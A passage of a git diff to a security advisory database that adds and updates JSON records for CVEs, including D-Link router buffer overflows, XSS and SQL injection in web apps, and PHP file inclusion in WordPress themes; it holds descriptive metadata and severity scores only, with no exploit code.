b/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-79pg-4mv3-p2x9/GHSA-79pg-4mv3-p2x9.json b/advisories/unreviewed/2026/02/GHSA-79pg-4mv3-p2x9/GHSA-79pg-4mv3-p2x9.json new file mode 100644 index 0000000000000..23e025eb44ea2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-79pg-4mv3-p2x9/GHSA-79pg-4mv3-p2x9.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-79pg-4mv3-p2x9", + "modified": "2026-02-20T21:31:24Z", + "published": "2026-02-20T21:31:24Z", + "aliases": [ + "CVE-2026-2855" + ], + "details": "A vulnerability has been found in D-Link DWR-M960 1.01.07. Affected is the function sub_4648F0 of the file /boafrm/formDdns of the component DDNS Settings Handler. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2855" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/12" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347094" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347094" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754458" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T20:25:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json b/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json index 6622c4bdb5a04..2f7df1a54d8b4 100644 --- a/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json +++ b/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-7qvf-m2xc-hg57", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-24944" ], "details": "Missing Authorization vulnerability in weDevs Subscribe2 subscribe2 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Subscribe2: from n/a through <= 10.44.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:38Z" diff --git a/advisories/unreviewed/2026/02/GHSA-7vm8-ccqm-97q2/GHSA-7vm8-ccqm-97q2.json b/advisories/unreviewed/2026/02/GHSA-7vm8-ccqm-97q2/GHSA-7vm8-ccqm-97q2.json new file mode 100644 index 0000000000000..96648729c36d3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7vm8-ccqm-97q2/GHSA-7vm8-ccqm-97q2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7vm8-ccqm-97q2", + "modified": "2026-02-20T21:31:24Z", + "published": "2026-02-20T21:31:24Z", + "aliases": [ + "CVE-2025-62326" + ], + "details": "HCL Digital Experience is susceptible to stored cross-site scripting (XSS) in the administrative user interface which would require elevated privileges to exploit.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62326" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128824" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T20:25:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-86qm-25mg-cp7q/GHSA-86qm-25mg-cp7q.json b/advisories/unreviewed/2026/02/GHSA-86qm-25mg-cp7q/GHSA-86qm-25mg-cp7q.json new file mode 100644 index 0000000000000..a3810ba44b9f5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-86qm-25mg-cp7q/GHSA-86qm-25mg-cp7q.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86qm-25mg-cp7q", + "modified": "2026-02-20T21:31:23Z", + "published": "2026-02-20T21:31:23Z", + "aliases": [ + "CVE-2026-2852" + ], + "details": "A vulnerability was identified in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This issue affects the function addSales/updateSales/deleteSales of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\bus\\controller\\SalesController.java of the component Sales Endpoint. The manipulation leads to improper access controls. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2852" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/63" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/63#issue-3846671301" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347088" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347088" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754431" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T19:23:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json b/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json index 2f1ee53565a26..91126eaff043e 100644 --- a/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json +++ b/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-87jc-9r3r-58w8", - "modified": "2026-02-20T18:31:40Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-27505" ], "details": "SVXportal version 2.5 and prior contain a stored cross-site scripting vulnerability in the user registration workflow (index.php submitting to admin/user_action.php). User-supplied fields such as Firstname, lastname, and email are stored in the backend database without adequate output encoding and are later rendered in the administrator interface (admin/users.php), allowing an unauthenticated remote attacker to inject arbitrary JavaScript that executes in an administrator's browser upon viewing the affected page.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json b/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json index 9fcc4765a442d..7b6a151110326 100644 --- a/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json +++ b/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c49j-5m2h-224g", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22380" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes UnlimHost unlimhost allows PHP Local File Inclusion.This issue affects UnlimHost: from n/a through <= 1.2.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:37Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cgwr-5223-r4pg/GHSA-cgwr-5223-r4pg.json b/advisories/unreviewed/2026/02/GHSA-cgwr-5223-r4pg/GHSA-cgwr-5223-r4pg.json index feeb9e8253eff..559b76a49526c 100644 --- a/advisories/unreviewed/2026/02/GHSA-cgwr-5223-r4pg/GHSA-cgwr-5223-r4pg.json +++ b/advisories/unreviewed/2026/02/GHSA-cgwr-5223-r4pg/GHSA-cgwr-5223-r4pg.json @@ -37,7 +37,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-285" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json index 882b4cca10a17..f58705af69137 100644 --- a/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json +++ b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-fgjg-x2hx-m8rf/GHSA-fgjg-x2hx-m8rf.json b/advisories/unreviewed/2026/02/GHSA-fgjg-x2hx-m8rf/GHSA-fgjg-x2hx-m8rf.json new file mode 100644 index 0000000000000..81918668a2bc3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fgjg-x2hx-m8rf/GHSA-fgjg-x2hx-m8rf.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fgjg-x2hx-m8rf", + "modified": "2026-02-20T21:31:23Z", + "published": "2026-02-20T21:31:23Z", + "aliases": [ + "CVE-2019-25444" + ], + "details": "Fiverr Clone Script 1.2.2 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the page parameter. Attackers can supply malicious SQL syntax in the page parameter to extract sensitive database information or modify database contents.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25444" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46637" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/fiverr-clone-script-sql-injection-via-page-parameter" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T19:23:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fr87-mwgv-wmcc/GHSA-fr87-mwgv-wmcc.json b/advisories/unreviewed/2026/02/GHSA-fr87-mwgv-wmcc/GHSA-fr87-mwgv-wmcc.json index 4f71cc4d5a745..e4672f27c8a70 100644 --- a/advisories/unreviewed/2026/02/GHSA-fr87-mwgv-wmcc/GHSA-fr87-mwgv-wmcc.json +++ b/advisories/unreviewed/2026/02/GHSA-fr87-mwgv-wmcc/GHSA-fr87-mwgv-wmcc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fr87-mwgv-wmcc", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-20T21:31:21Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-15563" ], "details": "Any unauthenticated user can reset the WorkTime on-prem database configuration by sending a specific HTTP request to the WorkTime server. No authorization check is applied here.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T11:15:56Z" diff --git a/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json b/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json index 71ec755e47357..0545d3cfb56ac 100644 --- a/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json +++ b/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-gfrr-w669-mfpw", - "modified": "2026-02-20T18:31:40Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-27504" ], "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in radiomobile_front.php via the stationid query parameter. When an authenticated administrator views a crafted URL, the application embeds the unsanitized parameter value into a hidden input value field, allowing attacker-supplied script injection and execution in the administrator's browser. This can be used to compromise admin sessions or perform unauthorized actions via the administrator's authenticated context.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json b/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json index 9383fb52f68b9..235f9f538902a 100644 --- a/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json +++ b/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gmmc-3vpq-7m4c", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22366" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Jude jude allows PHP Local File Inclusion.This issue affects Jude: from n/a through <= 1.3.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json b/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json index 43499f385ad23..423522c16a937 100644 --- a/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json +++ b/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h8h3-mqvc-hwrf", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22368" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Redy redy allows PHP Local File Inclusion.This issue affects Redy: from n/a through <= 1.0.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h9gf-cpg2-x9mv/GHSA-h9gf-cpg2-x9mv.json b/advisories/unreviewed/2026/02/GHSA-h9gf-cpg2-x9mv/GHSA-h9gf-cpg2-x9mv.json new file mode 100644 index 0000000000000..e7e6782cee933 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h9gf-cpg2-x9mv/GHSA-h9gf-cpg2-x9mv.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h9gf-cpg2-x9mv", + "modified": "2026-02-20T21:31:24Z", + "published": "2026-02-20T21:31:24Z", + "aliases": [ + "CVE-2026-2856" + ], + "details": "A vulnerability was found in D-Link DWR-M960 1.01.07. Affected by this vulnerability is the function sub_424AFC of the file /boafrm/formFilter of the component Filter Configuration Endpoint. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2856" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/13" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347095" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347095" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754474" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T21:19:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json b/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json index a2aaea7acfba6..260674d350197 100644 --- a/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json +++ b/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hc23-qvrh-v59g", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22370" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Marveland marveland allows PHP Local File Inclusion.This issue affects Marveland: from n/a through <= 1.3.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json b/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json index 64d787ad2ebd5..4a99c3e4245f3 100644 --- a/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json +++ b/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m23x-mm6q-4qg4", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-20T21:31:22Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22364" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes SevenTrees seventrees allows PHP Local File Inclusion.This issue affects SevenTrees: from n/a through <=1.0.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json b/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json index 1616b0064619c..1f94774cfeba0 100644 --- a/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json +++ b/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mj9g-3f37-7qv2", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-24950" ], "details": "Authorization Bypass Through User-Controlled Key vulnerability in themeplugs Authorsy authorsy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Authorsy: from n/a through <= 1.0.6.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-639" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json index ae8435903a1a7..4706d575a663d 100644 --- a/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json +++ b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-mv55-hjp6-qw4c/GHSA-mv55-hjp6-qw4c.json b/advisories/unreviewed/2026/02/GHSA-mv55-hjp6-qw4c/GHSA-mv55-hjp6-qw4c.json new file mode 100644 index 0000000000000..1f0f3e2e383e6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mv55-hjp6-qw4c/GHSA-mv55-hjp6-qw4c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mv55-hjp6-qw4c", + "modified": "2026-02-20T21:31:23Z", + "published": "2026-02-20T21:31:23Z", + "aliases": [ + "CVE-2019-25445" + ], + "details": "Fiverr Clone Script 1.2.2 contains a cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the keyword parameter. Attackers can craft URLs with script tags in the keyword parameter of search-results.php to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25445" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46637" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/fiverr-clone-script-cross-site-scripting-via-search-resultsphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T19:23:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json index 0b31d56c005f6..adaea3dbdea83 100644 --- a/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json +++ b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pg4q-7rh5-52c9", - "modified": "2026-02-20T18:31:40Z", + "modified": "2026-02-20T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-27502" ], "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in log.php via the search query parameter. The application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing an unauthenticated remote attacker to inject and execute arbitrary JavaScript in a victim's browser if the victim visits a crafted URL. This can be used to steal session data, perform actions as the victim, or modify displayed content.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": 